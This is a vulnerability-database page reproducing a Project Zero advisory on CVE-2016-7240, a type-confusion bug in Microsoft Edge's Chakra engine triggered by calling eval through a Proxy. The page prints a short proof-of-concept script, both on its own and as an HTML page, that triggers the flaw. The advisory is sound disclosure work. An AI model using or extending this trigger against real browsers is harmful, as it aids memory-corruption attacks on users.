Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2016-7240

Publish Date: 17 Nov 2016

                							

                &lt;!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948

In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

var p = new Proxy(eval, {});
p("alert(\"e\")"); 
--&gt;

&lt;html&gt;
&lt;body&gt;
&lt;script&gt;
var p = new Proxy(eval, {});
p("alert(\"e\")");
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Edge - 'eval' Type Confusion

Vulmon Search

About

Products

Connect